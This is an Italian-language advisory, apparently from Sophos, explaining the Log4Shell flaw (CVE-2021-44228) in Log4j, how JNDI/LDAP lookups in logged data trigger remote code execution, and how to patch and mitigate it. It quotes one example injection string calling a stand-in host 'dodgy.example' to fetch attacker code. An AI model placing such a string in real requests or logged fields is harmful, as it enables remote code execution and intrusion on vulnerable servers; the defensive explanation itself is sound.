Vulnerabilità Java Log4j - Log4Shell - Cosa è successo e cosa fare ora. Dopo Hafnium, Kaseya o Solarwinds, le aziende ancora una volta devono affrontare urgentemente una vulnerabilità del server di alto profilo chiamata Log4j - Log4Shell. Sophos chiarisce i fatti più importanti e ti dice cosa fare.
Il nome Log4Shell si riferisce al fatto che il difetto sfruttato è contenuto in una popolare libreria di codice Java chiamata Log4j (Logging for Java) e che se gli aggressori sfruttano con successo la vulnerabilità, ottengono effettivamente una shell, l'opportunità di eseguire qualsiasi codice di sistema di tua scelta.
“Il punto chiave dell'attacco Log4Shell è che il server esegue automaticamente il codice. Qualunque cosa un utente malintenzionato voglia fare a un server con la vulnerabilità, può farlo. Quindi è estremamente importante applicare le patch il prima possibile, perché molte persone là fuori che non hanno niente di buono stanno già provando a testare quali server sono ancora vulnerabili".
Paul Ducklin, esperto di sicurezza IT di Sophos
E come se quel comando non fosse abbastanza, la vulnerabilità è stata twittata come una vulnerabilità zero-day, ovvero un difetto di sicurezza che verrà documentato prima che sia disponibile una patch. Inoltre, il proof of concept (PoC) è stato pubblicato su GitHub e il problema è diventato noto in tutto il mondo mentre era ancora senza patch. I campanelli d'allarme suonano forte in tutto il mondo da venerdì e anche in Germania, per esempio il BSI ha dichiarato il livello di allerta rosso.
Convalida dell'input non corretta
La vulnerabilità, ora ufficialmente nota come CVE-2021-44228, ha avuto origine quando una richiesta innocua è stata inviata a un server vulnerabile, che includeva alcuni dati - come un'intestazione HTTP - che i cybercriminali si aspettano (o addirittura sanno) che il Server li scrive su il suo file di registro. I dati inseriti in questo modo formano una "trappola esplosiva" nascosta perché, mentre il server converte i dati in un formato adatto alla registrazione, avvia un download dal Web come parte integrante della creazione della voce di registro richiesta. E questa azione è difficile, perché se i dati che ritornano sono un programma Java valido (un file .class, in gergo), il server esegue quel file per aiutarlo a generare i dati di registro.
La libreria Log4j senza patch consente i requisiti di registrazione
Il trucco è che le versioni senza patch della libreria Log4j consentono alle richieste di registrazione per impostazione predefinita di attivare ricerche generali LDAP (servizi di directory) e varie altre ricerche online. Questa "caratteristica" esiste per aiutare a convertire dati non molto utili, ad esempio ID utente come OZZJ5JYPVK, in informazioni leggibili dall'uomo che hanno senso sulla tua rete, come Peter Miller. Queste richieste vengono effettuate tramite un toolkit Java comunemente utilizzato chiamato JNDI, abbreviazione di Java Naming and Directory Interface.
Questo approccio è fattibile fintanto che i dati registrati che possono attivare l'esecuzione di codice lato server sono limitati ai server di directory sulla propria rete. Tuttavia, molti server non sono configurati di conseguenza, quindi i "logsploiter" malintenzionati potrebbero tentare di incorporare testo come {$jndi:ldap://dodgy.example:389/badcode} nei dati che si aspettano che le aziende registrino e serverno automaticamente
- Utilizzare JNDI per inviare una richiesta LDAP alla porta specificata (389 nel nostro esempio) sul server esterno non attendibile specificato.
- recuperare il contenuto inaffidabile nel codice errato della posizione.
- eseguire il codice fornito dall'attaccante per ottenere "aiuto" con la registrazione.
In poche parole, questa pratica è nota in gergo tecnico come Remote Code Execution (RCE) non autenticato. Senza accedere o richiedere una password o un token di accesso, i criminali informatici potrebbero utilizzare una richiesta apparentemente innocua per indurre i server a segnalare, scaricare il loro codice e quindi infettarsi con il loro malware. A seconda dei diritti di accesso di un server alla rete interna, un tale RCE può aiutare i criminali informatici a eseguire una serie di attività dannose.
E questo è esattamente ciò che rende l'attuale punto di scacchi Log4Shell così pericoloso. Gli aggressori possono teoricamente drenare i dati dal server stesso; Scopri i dettagli sulla rete interna, modifica i dati sul server; esfiltrare i dati da altri server nella rete; impostare backdoor aggiuntive sul server o sulla rete per attacchi futuri o installare malware aggiuntivo come ficcanaso di rete, raschiatori di memoria, ladri di dati e cryptominer.
Cosa fare adesso!
Il concessore di licenza Apache ha pubblicato un pratico avviso di sicurezza su questo argomento. Sophos riassume anche le cose più importanti:
- Aggiorna ad Apache Log4j 2.15.0. Se stai usando Log4j, sembra che qualsiasi versione 2.x di 2.14.1 e precedenti sia vulnerabile per impostazione predefinita. (Se stai ancora utilizzando Log4j 1.x, è obbligatorio anche un aggiornamento in quanto non viene più fornito con gli aggiornamenti).
- Blocco della possibilità che JNDI effettui richieste a server non attendibili. Se non riesci ad aggiornare ma stai utilizzando Log4j 2.10.0 o successivo, puoi impostare il valore di configurazione log4j2.formatMsgNoLookups su true , che impedirà in primo luogo LDAP in uscita e ricerche simili.
- Verifica del runtime Java utilizzato. La build Java sottostante che stai utilizzando potrebbe impedire la generazione di questo errore in base alla propria configurazione predefinita. Ad esempio, Apache elenca esplicitamente Oracle Java 8u121 come protezione contro questo RCE.
La vulnerabilità riguarda anche gli utenti privati?
Log4Shell non significa solo allarme rosso per le aziende, ma anche gli utenti privati possono risentire degli effetti del gap. Ciò è particolarmente vero quando le persone utilizzano server cloud gestiti da una società di hosting o da un altro fornitore di servizi gestiti, che si tratti di un blog, di un forum o di un sito Web di famiglia. La prima cosa da fare qui è scoprire se questi servizi sono vulnerabili e quando sono pianificate le patch. Al momento ha sicuramente più senso cercare informazioni sui siti Web pertinenti, dal momento che i provider sono molto probabilmente inondati di e-mail in questo momento.
Prestare attenzione ai messaggi dei fornitori di servizi
Inoltre, occorre prestare attenzione agli avvisi di sicurezza ufficiali dei servizi online utilizzati nella casella di posta... ma anche qui è importante prestare attenzione! Se gli utenti ricevono messaggi sull'attuale vulnerabilità della sicurezza, forse ancora da un importante fornitore di servizi, non devono fare clic automaticamente sui collegamenti forniti nell'avviso o comporre numeri di telefono senza un esame critico. Gli attacchi informatici esperti nei media come Log4Shell provocano rapidamente free rider che vogliono sfruttare la paura degli utenti per i loro attacchi di phishing. In caso di dubbio, gli utenti dovrebbero trovare il proprio modo di ottenere informazioni utilizzando URL, indirizzi e-mail o numeri di telefono che hanno utilizzato in precedenza.
Maggiori informazioni su Sophos.com
A proposito di Sophos Sophos gode della fiducia di oltre 100 milioni di utenti in 150 paesi. Offriamo la migliore protezione contro le minacce informatiche complesse e la perdita di dati. Le nostre soluzioni di sicurezza complete sono facili da implementare, utilizzare e gestire. Offrono il costo totale di proprietà più basso del settore. Sophos offre soluzioni di crittografia pluripremiate, soluzioni di sicurezza per endpoint, reti, dispositivi mobili, e-mail e web. C'è anche il supporto dei SophosLabs, la nostra rete globale di centri di analisi proprietari. Le sedi di Sophos sono a Boston, USA e Oxford, UK.